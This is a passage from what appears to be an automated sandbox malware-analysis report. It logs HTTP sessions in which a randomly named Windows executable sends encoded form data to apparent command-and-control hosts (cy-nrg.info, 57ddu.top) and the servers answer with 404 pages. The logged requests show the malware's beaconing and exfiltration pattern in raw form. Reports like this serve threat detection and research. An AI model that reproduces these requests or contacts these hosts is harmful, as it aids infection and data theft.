73 7a 49 6c 6c 50 7a 6d 52 70 63 37 39 34 75 7a 38 2f 4c 76 79 55 30 73 35 2b 39 71 39 46 76 52 33 2b 61 61 78 54 54 62 58 58 52 58 33 59 39 37 37 74 30 56 4d 78 65 67 58 43 4a 63 49 44 2b 50 67 33 64 61 34 33 4f 36 73 79 57 4c 78 43 70 72 4c 42 32 77 6f 53 69 44 64 58 6a 62 4e 48 57 44 54 37 45 43 31 55 37 44 75 64 59 32 4e 2f 7a 6f 44 64 36 76 Data Ascii: 1Dd0AZ=ArFIAbrdaGPTQ8KS86JzsQIvnNY8y6zIwBDqTK4uOtm5rxo1IDRJUXs8UKkI3y2sPjajj2cLbrmFU8TRTylIHijRjfYOnQqnp1IAGViOszIllPzmRpc794uz8/LvyU0s5+9q9FvR3+aaxTTbXXRX3Y977t0VMxegXCJcID+Pg3da43O6syWLxCprLB2woSiDdXjbNHWDT7EC1U7DudY2N/zoDd6v
Oct 9, 2024 16:31:13.437375069 CEST	558	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 09 Oct 2024 14:31:13 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED] Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50017	217.160.0.147	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:15.344554901 CEST	1796	OUT	POST /ds60/ HTTP/1.1 Host: www.cy-nrg.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cy-nrg.info Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.cy-nrg.info/ds60/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 41 72 46 49 41 62 72 64 61 47 50 54 51 38 4b 53 38 36 4a 7a 73 51 49 76 6e 4e 59 38 79 36 7a 49 77 42 44 71 54 4b 34 75 4f 74 65 35 73 41 49 31 5a 55 46 4a 56 58 73 38 64 71 6b 46 33 79 33 77 50 6a 43 76 6a 32 67 39 62 6f 65 46 55 66 62 52 55 47 4a 49 4a 69 6a 52 71 2f 59 31 71 77 71 58 70 78 73 4d 47 56 79 4f 73 7a 49 6c 6c 4d 72 6d 59 63 6f 37 37 34 75 77 37 2f 4c 7a 6a 45 30 55 35 2b 6c 63 39 46 72 72 33 4b 57 61 78 79 76 62 56 42 4e 58 6f 6f 39 35 38 74 30 4e 4d 78 54 34 58 43 55 6a 49 43 4c 55 67 77 78 61 37 79 72 34 35 47 66 52 77 41 31 73 5a 68 32 55 39 56 47 63 53 46 66 30 46 6d 79 74 51 4a 45 7a 39 52 6a 51 72 76 67 36 66 5a 6a 53 54 4b 7a 5a 2b 75 62 33 6b 4c 42 52 75 69 63 4b 59 53 69 71 55 6b 4f 6f 6f 36 74 45 62 50 77 47 2f 70 43 61 33 61 61 58 2b 63 46 2b 59 67 75 55 48 4d 4a 30 78 4e 68 5a 46 4a 57 6f 6a 61 5a 6a 36 4f 4a 45 68 6b 4d 57 37 62 47 2f 4f 6f 4a 4f 4c 72 49 2b 46 4c 54 66 2f 63 30 61 53 41 57 34 76 30 33 73 70 44 78 78 73 55 4d 76 76 57 5a 43 62 38 6e [TRUNCATED] Data Ascii: 1Dd0AZ=ArFIAbrdaGPTQ8KS86JzsQIvnNY8y6zIwBDqTK4uOte5sAI1ZUFJVXs8dqkF3y3wPjCvj2g9boeFUfbRUGJIJijRq/Y1qwqXpxsMGVyOszIllMrmYco774uw7/LzjE0U5+lc9Frr3KWaxyvbVBNXoo958t0NMxT4XCUjICLUgwxa7yr45GfRwA1sZh2U9VGcSFf0FmytQJEz9RjQrvg6fZjSTKzZ+ub3kLBRuicKYSiqUkOoo6tEbPwG/pCa3aaX+cF+YguUHMJ0xNhZFJWojaZj6OJEhkMW7bG/OoJOLrI+FLTf/c0aSAW4v03spDxxsUMvvWZCb8n5EU0xs1y2qY/1GUq+kRIL9OOzVY73OmJOTTXLG14jO63F+33J4Al6c3LdelZw9Xy0OFq4EldwIJHxqbVVnCNH3ez07U+zD1sKttkCqp/9fwgJ7d5rA4SNTiDENBt4OAxJFJDRp6+Dfy8WSihM+SjIceFjm+WEA0D8CdoQjDDg2BeCOXclCbI4HvSmRbE53TUIpR6QUzh0PBUmCgPykerVhIFxkTE1c8h8fqEP4uI1gF3+3n04+dySzy09T8Vg1iyIbfYuEVqmYm9+ipr7u7URbPLbChccVPqSYCkw5uvgKKdUPiDoERo5liYPX1e73b39IUL/yBloU+UhKiivhJK/fFgLeZCs71V6Vu7UQaEpvTK2GkzQX3kQw89gEHgfoPxKTKBixCBkUDSKHCAC2WnrNPL++Wo+tkVq9NBkwW5GCt4sPBn39QYNi/sm+NXumJ9ll/hCKrZHv1TgnLZA4yhLqmbWTEMeVeqzN7qJusXiQ2BGtxWm6kv6eTtMKuFwKHgt75M132P06Vm69Ov/emWObl+8Af3ymoRmd31STQkborVgR2PUe5OxVxt3MHhtFVc/FwFQJ+CS2KcjEHe9VnndGrqBjES6DrYTXByIdJAdN7/QRXSEHcYVAxRiX7rbk1WsJ1l7g2h5xJtTvBlBprQoTSqVTxTudzfvV [TRUNCATED]
Oct 9, 2024 16:31:16.064273119 CEST	558	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 09 Oct 2024 14:31:15 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED] Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50018	217.160.0.147	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:17.895442009 CEST	501	OUT	GET /ds60/?1Dd0AZ=NptoDuGSTmnkVeWAwrxyuzRQqKBWh8zew1/AQPUPJcat0lU6P0BeUWoCdZx3tRqkOQ6ojXgPGKinPOP1NyNwGTjSyc4ttB+G8hVuOCWpwy4v7vXDapYH466x6ojHnThYog==&-n1P=0hFdS6 HTTP/1.1 Host: www.cy-nrg.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:31:18.115134954 CEST	501	OUT	GET /ds60/?1Dd0AZ=NptoDuGSTmnkVeWAwrxyuzRQqKBWh8zew1/AQPUPJcat0lU6P0BeUWoCdZx3tRqkOQ6ojXgPGKinPOP1NyNwGTjSyc4ttB+G8hVuOCWpwy4v7vXDapYH466x6ojHnThYog==&-n1P=0hFdS6 HTTP/1.1 Host: www.cy-nrg.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:31:18.542467117 CEST	745	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 601 Connection: close Date: Wed, 09 Oct 2024 14:31:18 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50019	154.23.184.218	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:31.676281929 CEST	753	OUT	POST /1h9c/ HTTP/1.1 Host: www.57ddu.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.57ddu.top Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.57ddu.top/1h9c/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 68 4d 46 48 79 7a 4c 6c 68 37 34 35 56 7a 59 41 72 37 6d 52 6f 53 63 6c 75 43 37 62 79 34 5a 4d 66 79 41 6f 74 54 43 34 44 38 2b 73 2b 48 6d 71 32 53 36 4a 59 34 2f 30 6e 78 41 47 70 69 4c 51 6e 6c 77 43 42 78 51 55 70 56 69 31 47 6b 53 71 32 5a 6e 49 62 37 34 64 7a 43 2f 2b 59 50 68 53 73 76 6e 73 35 78 74 47 31 49 76 33 77 6f 4f 37 74 45 57 32 32 63 55 47 38 78 61 32 74 43 76 30 72 58 49 59 6d 6f 64 66 68 6f 6d 70 6c 4f 75 5a 71 63 4e 4d 69 69 43 79 4e 75 2f 52 34 4c 53 68 50 42 2b 39 4e 73 35 78 61 75 53 77 49 2b 34 63 79 79 79 55 32 4c 64 62 66 37 69 4f 77 54 55 57 54 55 4e 54 76 30 55 3d Data Ascii: 1Dd0AZ=hMFHyzLlh745VzYAr7mRoScluC7by4ZMfyAotTC4D8+s+Hmq2S6JY4/0nxAGpiLQnlwCBxQUpVi1GkSq2ZnIb74dzC/+YPhSsvns5xtG1Iv3woO7tEW22cUG8xa2tCv0rXIYmodfhomplOuZqcNMiiCyNu/R4LShPB+9Ns5xauSwI+4cyyyU2Ldbf7iOwTUWTUNTv0U=
Oct 9, 2024 16:31:32.582340002 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:31:32 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4adce-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50020	154.23.184.218	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:34.938709021 CEST	773	OUT	POST /1h9c/ HTTP/1.1 Host: www.57ddu.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.57ddu.top Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.57ddu.top/1h9c/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 68 4d 46 48 79 7a 4c 6c 68 37 34 35 56 51 41 41 74 59 2b 52 74 79 63 69 68 69 37 62 38 59 5a 49 66 79 4d 6f 74 58 36 6f 44 50 61 73 77 47 57 71 33 54 36 4a 62 34 2f 30 74 52 41 48 32 79 4c 58 6e 6c 74 78 42 30 77 55 70 56 32 31 47 6d 4b 71 6a 2b 7a 4c 61 72 34 54 2f 69 2f 34 58 76 68 53 73 76 6e 73 35 78 35 73 31 49 6e 33 77 5a 65 37 73 6d 2b 33 37 38 55 42 2f 78 61 32 70 43 75 7a 72 58 4a 31 6d 73 38 4b 68 74 69 70 6c 4c 53 5a 71 75 6c 4e 31 53 43 30 54 65 2b 45 34 71 7a 76 41 67 57 4c 47 50 4d 73 4f 76 76 50 4e 49 56 32 6f 51 36 38 6c 72 78 6a 50 6f 71 35 68 6a 31 2f 4a 33 64 6a 78 6a 42 34 6b 61 62 77 68 6d 6f 38 7a 32 4b 57 37 55 75 78 54 46 55 53 Data Ascii: 1Dd0AZ=hMFHyzLlh745VQAAtY+Rtycihi7b8YZIfyMotX6oDPaswGWq3T6Jb4/0tRAH2yLXnltxB0wUpV21GmKqj+zLar4T/i/4XvhSsvns5x5s1In3wZe7sm+378UB/xa2pCuzrXJ1ms8KhtiplLSZqulN1SC0Te+E4qzvAgWLGPMsOvvPNIV2oQ68lrxjPoq5hj1/J3djxjB4kabwhmo8z2KW7UuxTFUS
Oct 9, 2024 16:31:36.236040115 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:31:35 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4adce-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Oct 9, 2024 16:31:36.236274958 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:31:35 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4adce-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50021	154.23.184.218	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:37.483074903 CEST	1790	OUT	POST /1h9c/ HTTP/1.1 Host: www.57ddu.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.57ddu.top Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.57ddu.top/1h9c/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 68 4d 46 48 79 7a 4c 6c 68 37 34 35 56 51 41 41 74 59 2b 52 74 79 63 69 68 69 37 62 38 59 5a 49 66 79 4d 6f 74 58 36 6f 44 50 53 73 77 30 75 71 32 77 53 4a 61 34 2f 30 32 52 41 43 32 79 4b 4c 6e 6c 6c 39 42 30 39 68 70 58 4f 31 48 46 43 71 6e 37 50 4c 56 72 34 54 33 43 2f 39 59 50 68 4c 73 76 32 72 35 78 70 73 31 49 6e 33 77 61 32 37 70 45 57 33 35 38 55 47 38 78 61 79 74 43 76 55 72 58 51 41 6d 74 39 78 68 65 71 70 6c 72 69 5a 6f 37 52 4e 70 43 43 32 53 65 2f 48 34 71 2f 6b 41 67 61 39 47 4f 34 47 4f 6f 44 50 4d 70 6f 63 74 42 79 49 6d 35 4d 4f 45 2f 53 55 67 58 4a 54 51 32 31 35 38 51 35 32 35 70 79 64 6f 7a 6b 57 34 53 33 6e 6b 67 47 32 55 77 74 78 53 52 36 32 74 4d 76 62 46 32 76 4f 6c 65 44 2b 59 6c 33 41 47 46 7a 66 49 50 31 52 6f 4a 42 76 33 75 52 37 47 50 57 68 33 72 55 67 35 6e 56 43 39 7a 76 34 58 46 6d 4a 71 73 4e 7a 72 63 33 36 56 72 71 59 66 31 68 30 61 4d 46 67 59 56 48 77 6b 37 50 57 6f 66 6b 61 69 43 41 45 58 36 2b 77 36 38 73 64 45 36 50 53 35 4f 6d 78 6a 33 6f [TRUNCATED] Data Ascii: 1Dd0AZ=hMFHyzLlh745VQAAtY+Rtycihi7b8YZIfyMotX6oDPSsw0uq2wSJa4/02RAC2yKLnll9B09hpXO1HFCqn7PLVr4T3C/9YPhLsv2r5xps1In3wa27pEW358UG8xaytCvUrXQAmt9xheqplriZo7RNpCC2Se/H4q/kAga9GO4GOoDPMpoctByIm5MOE/SUgXJTQ2158Q525pydozkW4S3nkgG2UwtxSR62tMvbF2vOleD+Yl3AGFzfIP1RoJBv3uR7GPWh3rUg5nVC9zv4XFmJqsNzrc36VrqYf1h0aMFgYVHwk7PWofkaiCAEX6+w68sdE6PS5Omxj3oFyc2HetM7EqLNKmvLsuoMiAS2Srp2A4PgelMGmNJOCZXPX6BGW+iuW2HS7la3jYXEU7+pNaqtiRCWNgC3M7DgLH2H4VHULcyoDM3TKook7K3F/vAOiHjzAh+PUYm3knB+kPxhnJhgR99jooyNoE7odQu+7uUsifrh/DeNLL0fljzYXRhGpFHHWasTMW0cBr4EW7piPhvnuWC1z9w8z0fvGCzGvnfkh18mQRzRsLLqXmI66343W3pDducopmkKCa4hdMVbAqx3093m3+0xuq0J/Zjxfk0ayG+xOG4K6wq8gKhvIH1CGpIIs0TC/T2HLs9OdrmSQKNeTsIXuXnGFSPDhq1ToQ2e356NBTcXe8/ZqhZVhj/+AJx41cg1wQNtOcyy+8sxpk/HSZQhSd7lS7nmZiLcUTYs1lRkxbBBpwWIRwDf4WBlPZqQANZFtdqB3jgz5UvwcOgLT7fP3EQxZbAOSG3LzGcf+67vLO7cJSXc8fXPYRsI22tF6NQiZmaWS5awFkAMWON+Z1CMbDtP+mbNsL5rRIuDdMMBR0bgwluaeq5688mHpycvUCcfMZ2BEDRwjw3HoM3QIKHY04KjpvCaTddBk4kpuY6CXlaQwXrP+0OcdNBelOr1+iW9yBn3e7Kktd4gKG0deAkwMgM7H00z1uV8/jL7iHX16 [TRUNCATED]
Oct 9, 2024 16:31:38.384784937 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:31:38 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4adce-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50022	154.23.184.218	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:31:40.022943974 CEST	499	OUT	GET /1h9c/?1Dd0AZ=sOtnxD/yobNnegY8jaSsoAQmhivqqrJAOVcBiS67N8+hqBqB+i+1bOvJoDF03ArbwEkHPmpF5H+WU0CTxafZbPEDuWvRa8lUtMqL2ERE56je042ykjvM2v8hySrFvxy+1w==&-n1P=0hFdS6 HTTP/1.1 Host: www.57ddu.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:31:40.913161993 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:31:40 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4adce-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50023	107.163.96.57	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

